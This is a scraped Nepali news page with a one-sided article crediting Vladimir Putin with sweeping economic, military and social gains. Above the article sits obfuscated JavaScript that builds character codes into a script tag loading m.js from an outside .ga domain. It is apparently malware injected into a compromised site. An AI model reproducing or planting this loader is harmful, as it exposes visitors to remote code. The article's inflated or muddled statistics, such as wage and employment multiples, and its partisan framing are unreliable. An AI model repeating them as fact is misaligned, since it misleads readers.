Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); रुसमा पुटिनको नेतृत्वको उपलब्धि – जनदिशा

रुसमा पुटिनको नेतृत्वको उपलब्धि

Last Updated Date:

बिगत १२ वर्षमा रुसले बिभिन्न क्षेत्रमा निकै ठूलो उपलब्धि हासिल गरेको विभिन्न तथ्यांकले देखाएको छ । यो समयमा वर्तमान राष्ट्रपति भ्लादिमिर पुटिन ४ वर्ष प्रधानमन्त्रीका रुपमा र बाँकी ८ वर्ष राष्ट्रपतिका रुपमा देशको सेवा गर्दै आइरहेका छन् । त्यसो त उनी सन् २००० देखि नै रुसको राजनीतिको केन्द्रीय भूमिकामा रहँदै आएका छन् ।

पुटिन सन् २००० देखि सन् २००८ सम्मको अवधिमा राष्ट्रपति रहँदा उनले आफ्नो बिरासतमा आर्थिकरुपले अत्यन्त जर्जर रसिया, प्रिथकतावादी आन्दोलनले टाउको उठाएको तंगभंग हुनै लागेको रसिया र पश्चिमाहरुको धोकाधडी झेलेको रसिया पाएका थिए । उनले त्यस अवधिको चेचेन्या, दागेस्तान र अब्खाजियाको समस्याको हल गरे । साउथ ओसेटियामा आवाद रुसी मूलका मानिसहरुलाइ जर्जियाली दमनबाट सुरक्षित पारे ।

राष्ट्रपति पुटिनले राष्ट्रिय सम्पतिमाथि माफियाहरुबाट भैरहेको अबैध कब्जाबाट रुसलाइ धेरै हदसम्म जोगाए । बढदो मुद्रास्फ्रिति रोकथाम गरे । रोजगारीको अवसर सृजना गरे । देशको बाह्य तथा आन्तरिक ऋणको न्यूनीकरण गरे । सारांशमा उनले आफ्नो पहिलो आठ वर्षीय कार्यकाललाई मुलुकमा स्थिरता प्रदान गर्ने काममा लगाए ।

बिगत १२ वर्षमा राष्ट्रपति पुटिनको नेतृत्वको रुसमा राष्ट्रिय बजेटमा २२ गुणा वृद्धि हुन गइ विकास निर्माणका गतिबिधिहरु सम्पन्न भए । विकास निर्माणका गतिबिधिले रोजगारी सृजना हुने नै भयो । रुसी सेनालाई आधुनिकीकरण गर्न र अत्याधुनिक हातहतियारले लैस पार्न मिलिटरी बजेटमा उनले सो अवधिमा ३० गुणाले वृद्धि गरे ।

सोहि अवधिमा रुसको कूल ग्राहथ्य उत्पादन (जीडीपी) मा १२ गुणा वृद्धि भै ३६सौं स्थानबाट ६टौं स्थानमा उक्लन सफल भयो । रुस अझै माथि जानसक्ने प्रचुर सम्भावना देखिन्छ, किनभने उसंग श्रोत, साधन, प्रबिधि र सिप छ । नभएको जनशक्ति मात्र हो । बाहिरका श्रमिक भित्र्याउने अनुमतिको व्यावस्था गर्न सके त्यो समस्याको पनि समाधान निस्कन सक्छ ।

सो अवधिमा रुसको सुनको सश्चितिमा ४८ गुणाले वृद्धि भएको छ । २५६ खनिज भण्डारहरु रुसी सरकारको नियन्त्रणमा आएको छ । यी खनिज सम्पत्तिहरु एल्त्सिनकालमा माफियाहरुको हातमा पुगेको थियो । अब जम्मा ३ वटा भण्डारहरुमाथि मात्र माफिया समूहको आधिपत्य छ ।

पुटिनको पछिल्लो १२ वर्षिय शासनकालमा विगतमा व्यक्तिहरुको हातमा नाजायज तरिकाले गएको तेल उद्योगको ६५ प्रतिशत हिस्सा पुन: सरकारले अधिकरण गरिसकेको छ भने ग्यास उद्योगको ९५ प्रतिशत हिस्सासमेत सरकारी स्वामित्व अन्तर्गत आइसकेको छ । यसरी पुटिनले एल्त्सिनकालको लुटखसौटलाई धेरै हदसम्म सच्याउने प्रयास गरेका छन् ।

कृषिको क्षेत्रमा पुटिनकालमा उल्लेख्य प्रगति भएको छ । हाल रुस कृषि उत्पादनको निकाशीमा विश्वको दोश्रो या तेश्रो स्थानमा छ । उसले अमेरिकालाई चौथो स्थानमा धकेली दिएको छ । यो क्रम विगत पाँच वर्षदेखि लगातार रुपमा चलिरहेको छ । विश्वका सबैभन्दा ठूला अर्थतन्त्रहरु मध्ये कूल ग्रहस्थ्य उत्पादनको तुलनामा राष्ट्रिय ऋणको अनुपात रुसको सबैभन्दा कम (१२ प्रतिशत मात्र) छ । जिडिपी र राष्ट्रिय ऋणको अनुपात जापानमा २३७ प्रतिशत, इटालीमा १३३ प्रतिशत, अमेरिकामा १०७ प्रतिशत, बेलायतमा ८० प्रतिशत, जर्मनीमा ५९ प्रतिशत, फ्रान्समा ९८ प्रतिशत र क्यानाडामा ८९ प्रतिशत रहेको तथ्यांकले देखाएको छ ।

रुसमा यसै अवधिमा कामदारहरुको वेतनमा १८.५ गुणाले बढोत्तरी भएको छ । यसबाट रुसी जनताहरुको विदेश गएर धन कमाउने ट्रेन्डमा भारी संख्यामा कमि आएको देखिन्छ । सन् १९९९ देखि पन्ध्र लाख मानिसहरु प्रतिवर्ष कामको खोजिमा विदेशिने गर्थे भने सन् २०११ देखि यता त्यो संख्या मात्र २१ हजारमा खुम्चिएको छ । यसको अर्थ ७१.५ गुणा मानिसहरुलाइ स्वदेशमा रोजगारी मिलेको देखिन्छ ।

यस अवधिमा रसियन जनताहरुको सरदर आयु १२ वर्षले वृद्धि भएको देखिन्छ । यो भनेको हेल्थ केयर सिस्टममा राम्रो सुधार भएको संकेत हो । निवृत्त रसियनहरुको पेन्सन पनि चौध गुणाले बढेको छ ।

यसका साथै राष्ट्रपति पुटिनले सन् १९९६ को अगष्ट २२ मा भएको खासायुर्ट सम्झौतालाइ रद्द गरिदिए । यस सम्झौताले चेचेन्या रुसबाट लगभग पृथक अस्तित्वमा रहेको मान्यता दिएको थियो । पुटिनको यस कामले रुसी महासंघको प्रादेशिक अखण्डताको रक्षा गरेको देखिन्छ ।

राष्ट्रपति पुटिनले अन्तर्राष्ट्रिय गैर सरकारी संस्थाहरुले रुसभित्र गरेका गद्दारीलाई ध्यानमा राखेर त्यस्ता संस्थाहरुमाथि प्रतिबन्ध नै लगाइदिए । आइएनजीओहरुले रुसभित्रको सूचना संकलन गरेर पश्चिमी देशहरुलाई बुझाउने काम गरिरहेकाले पुटिनले तिनीहरुलाई ‘फिफ्थ कोलम’ को संज्ञा दिएका थिए ।

राष्ट्रपति पुटिनले विदेशमा बैंक खाता हुने र बिदेशी स्थायी बसोबासको अनुमति लिने रुसीहरुलाइ देशको राजनैतिक गतिबिधिमा संलग्न हुनबाट रोकिदिए ।

उनकै पछिल्लो कार्यकालमा सिरियाको प्रतिरक्षा भयो । चेचेन्यामा युद्ध रोकिएर शान्ति बहाल भयो । पूर्वी युक्रेनका रुसी भाषी जनतामाथिको अत्याचारमाथि रोक लगाउने प्रयास भैरहेको छ । क्रिमिया पुन: रुसको मूलधारमा समेटिएको छ । मध्य एसियाका गणतन्त्रहरुमाथिको रुसी प्रभाबमा वृद्धि भएको छ । अफगानिस्तानको सवालमा रुसको भूमिका अझै निर्णायक हुँदै आइरहेको छ । इरानसंग रुसको रणनैतिकस्तरको सम्बन्ध कायम भएको छ । पाकिस्तानसंगको सम्बन्ध सुधारोन्मुख छ । चीनसंगको सम्बन्ध ‘मिलिटरी एलायन्स’ सम्म पुग्न सक्ने सम्भावना छ ।

पश्चिमी राष्ट्रहरुको कडा आर्थिक प्रतिवन्धका बाबजुद पनि रुसले प्रगति गरेको टड्कारो रुपमा देखिन्छ । अहिले पनि कोभिड -१९ महामारी बिरुद्ध सबैभन्दा पहिला रुसले नै भ्याक्सिन तयार पारेको छ । राष्ट्रपति पुटिनका यी उपलब्धिहरुमाथि पश्चिमाहरु र स्वदेशकै पुटिन बिरोधिहरुले सदैब आँखा चिम्लेका छन् । तर उनीहरु पुटिनमाथि हमेसा हिलो छ्याप्न मात्रै उद्दत देखिन्छन् ।

जनदिशा डेस्क

यो सामग्री सेयर गर्नुहोस

तपाईलाई माथिको समाचार/लेख कस्तो लाग्यो ? प्रतिक्रिया दिनुहोस ।
Top